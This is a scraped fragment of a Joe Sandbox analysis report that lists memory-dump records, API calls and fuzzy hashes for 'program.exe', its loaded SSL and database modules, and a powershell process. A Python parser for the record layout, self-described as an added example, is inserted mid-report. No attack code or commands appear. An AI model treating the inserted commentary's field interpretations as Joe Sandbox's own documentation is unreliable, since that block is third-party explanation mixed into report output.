• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
• Instruction ID: 6d89d0196e781cbe9b536f63fc846c5fa44fd028449234b695db76210944b5d4
• Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
• Instruction Fuzzy Hash: 1191ADB3E1C76285F7609F6D94406BD2BA0AB44B89F544139DF0EA7EA4DF39E482D700
APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _get_daylight$_isindst
• String ID:
• API String ID: 4170891091-0
• Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
• Instruction ID: 2480a9834041957690d72a35a3b3ad33d18c6458603f197fed6fc41226b2a31f
• Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
• Instruction Fuzzy Hash: 6451A573F092218AEB14DF689D556BC3765AB4436AF500235DF1E96EF5DF3CAC428600
APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
• Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
• Instruction ID: 803bd9ca3fe3c0d96ccc62fc5c04e7848bbf9edbc97e47014380b2b047fb8bdb
• Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
• Instruction Fuzzy Hash: 8C516A23E086518AFB10DFB994503BD27A1AB48B99F248535EF4D9BAA9DF38E4418701
APIs
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
• Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
• String ID:
• API String ID: 4225454184-0
• Opcode ID: 64d0e023b8156f1abb0180eff28680d25e95d8f25c8afd14df0e7a8be79250ce
• Instruction ID: 0dec83d39894424bb613d8cbbe4bd8dd6449324418371643381e357d98a2bbc8
• Opcode Fuzzy Hash: 64d0e023b8156f1abb0180eff28680d25e95d8f25c8afd14df0e7a8be79250ce
• Instruction Fuzzy Hash: 372148A2B19B5283DB64AF16B5511BAA3A1FF44BC0F095135DB8E4BFA6DF2CE0518700
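The function records in this listing (an "APIs" section with the resolved calls and their call-site addresses, a "Memory Dump Source" section naming the dump and the image base, the IDA plugin snapshot, and a "Similarity" section of IDs and fuzzy hashes) are what an analyst correlates across reports to separate packer and runtime boilerplate from sample-specific code. The parser below is an added example, not part of the Joe Sandbox report or its tooling. It assumes only the record layout visible on this page: it strips the "Download File" button label that the page extractor fused onto the dump names, flags records whose API ID is a bare address (such as 00007A463010 in the record above), which means the sandbox could not name the call target and the ID is useless for matching, and buckets records by the image base they were lifted from (00007FF6B7500000, the program.exe image, versus 00007FFE01300000, a second loaded module this section does not name). The embedded sample is constructed from two of the records on this page, abbreviated.

```python
import re
from collections import defaultdict, namedtuple
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
RESIDUE = "Download File"  # download-button label the page extractor fused onto the dump names
API_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^•\s*Source File:\s*(?P<dump>[^,\s]+),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+),")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")
HEX_ONLY = re.compile(r"^[0-9A-Fa-f]{8,16}$")

ApiCall = namedtuple("ApiCall", "name module ref")  # ref: call-site address inside the dumped image


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    dump: str = ""
    image_base: int = 0
    associated: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "Snapshot File" plus the "Similarity" key/value pairs


def parse_records(text: str) -> list:
    """One FunctionRecord per "APIs" header; a listing cut mid-record still yields a partial record."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith(RESIDUE):
            line = line[: -len(RESIDUE)].rstrip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs" or current is None:
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:
            continue  # stray text before the first section header
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                current.apis.append(ApiCall(m["api"], m["module"], int(m["ref"], 16)))
            continue
        m = SOURCE_RE.match(line) if section == "Memory Dump Source" else None
        if m:
            current.dump, current.image_base = m["dump"], int(m["base"], 16)
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m["key"], m["value"].strip()
        if key == "Associated":
            current.associated.append(value)
        else:
            current.fields[key] = value
    return records


def api_id_unresolved(rec: FunctionRecord) -> bool:
    """A bare address as "API ID" (e.g. 00007A463010) means the sandbox could not name the
    call target; match such functions on their fuzzy hashes instead of on the API ID."""
    return bool(HEX_ONLY.match(rec.fields.get("API ID", "")))


def group_by_image(records: list) -> dict:
    """Bucket records by image base: the main executable versus each loaded module."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec.image_base].append(rec)
    return dict(groups)


# Constructed sample: two records copied from this page, abbreviated, residue left in on purpose.
SAMPLE = """\
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B751CF4B), ref: 00007FF6B751D07C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B751CF4B), ref: 00007FF6B751D107
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
• Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
• Instruction Fuzzy Hash: 1191ADB3E1C76285F7609F6D94406BD2BA0AB44B89F544139DF0EA7EA4DF39E482D700
APIs
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
Similarity
• API ID: 00007A463010
• Opcode Fuzzy Hash: 64d0e023b8156f1abb0180eff28680d25e95d8f25c8afd14df0e7a8be79250ce
"""

RECORDS = parse_records(SAMPLE)
```

For matching a function against another report, use the Opcode Fuzzy Hash and Instruction Fuzzy Hash pair from `fields`; the API ID is a readable label, not a stable key, and is a raw address whenever the call target could not be resolved.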
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.2116621230.00007FFDFAE61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAE60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae60000_program.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
• API String ID: 3568877910-384499812
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
• API String ID: 3568877910-1331951588
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
• String ID: string or blob too big
• API String ID: 4225454184-2803948771
APIs
• 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFE0139D93A,?,?,?,00007FFE0139DCFB), ref: 00007FFE0139D8A7
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
• String ID: CRE$INS
• API String ID: 4225454184-4116259516
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: 00007B6570
• String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
• API String ID: 4069847057-118859582
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B7519046
  • Part of subcall function 00007FF6B751A948: HeapFree.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
  • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6B750CBA5), ref: 00007FF6B7519064
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                              • API String ID: 3580290477-2554842565
                                                                                                                                                                                                                                              • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                              • Instruction ID: b677119557b6f86b8c06a5fb58fd3cc327bce63cb1526ffe50d729b2e8220c3e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90418937A0CA628AEB159F2998401BD67A4EF44BD1B554039EB4E87FA5DF3CE891C340
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                              • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                              • Instruction ID: a294a28bbd36a8039f0d9a75b480996b95cbcfc70026829bcab52d0d8dc4ab8f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F41B123A1CA9585DB609F2AE4443AA67A1FB98784F444135EF4DC7BA8EF3DD441CB40
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
                                                                                                                                                                                                                                              • API String ID: 0-402823876
                                                                                                                                                                                                                                              • Opcode ID: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                                              • Instruction ID: 47381be6b5ffc261daca45eb71f081691ee1a824abbfe58454e225ffbdbc78b3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2331C360B0AA8282EB64FB25D8553FD1290FF48744F8C4136DB4D877EEDE2CDA408311
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$System$File
                                                                                                                                                                                                                                              • String ID: gfff
                                                                                                                                                                                                                                              • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                              • Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                              • Instruction ID: dd9afd47a17b20d07f16837a4d6ad0e51b85fcdb3d73576fa96add59b5c094ab
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7221D572A0968B86DB98DF29D4003B976E4FB89B84F488139DB4E87769DE3CD1418B01
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                              • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                              • Instruction ID: 17d1cb73cfb60a2195a6cc62f711a24f1eb5c2635f239ee9431842b37d667d3d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE21B163A0C69181EB209F19D84427D73B1FB88B85F864139DB8D83AE4DF7CE985CB41
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Opcode ID: 7c4e97459396328d1dd943123e1f03ca1e5a8da574ae82d3dd03b970f8f135e1
                                                                                                                                                                                                                                              • Instruction ID: 42ada090a615312917e6c53743a79e1ed2b4d9d72cff3ddaaf4a44f4f49c8729
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c4e97459396328d1dd943123e1f03ca1e5a8da574ae82d3dd03b970f8f135e1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A41253140DBC44FE76AAB689C519523FF0EF42324F1601DFD488CB0A3D625E805C792
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1928918265.00007FFD9A4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a4e0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1c8fa7593010f62b35e1ff1c1e16c3df1ac461fd4abd2d5fe44ef9d974b13a23
                                                                                                                                                                                                                                              • Instruction ID: 0eda5a5fc032a7f203c831a619fa2818e0fc630b45b3a86b757fc2fed51b6698
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c8fa7593010f62b35e1ff1c1e16c3df1ac461fd4abd2d5fe44ef9d974b13a23
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A218B32B0CA490FEB99DBAC94553B477D0EB55325F1441FBC04DC32A7CE68A8068751
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1928918265.00007FFD9A4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a4e0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1c95d813f98e6aebf8da592bf7939c7542329410c8a5f99a96e8f701310b83db
                                                                                                                                                                                                                                              • Instruction ID: abac36ba8a377c06f0558d840b5c3394d6125b1a6e1ae9b525bddddcdfef540c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c95d813f98e6aebf8da592bf7939c7542329410c8a5f99a96e8f701310b83db
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2014433A0D5894FE701BFACACB64E97B90EF91319B1801B7D09DC70A2DE1969048382
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1928918265.00007FFD9A4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a4e0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                              • Instruction ID: f7bd2d1d2dacaefbbddbeb645a8dcb0e3750071bb665b73589ac630832aa265a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1001A73120CB0C4FD758EF0CE451AA5B3E0FB85324F10056DE58AC36A5DB36E882CB46
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1929778258.00007FFD9A5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A5B0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a5b0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 603ee98ef949dc6b4199bc1dcfb392f4323efef4face4d16625b4ae652fd9795
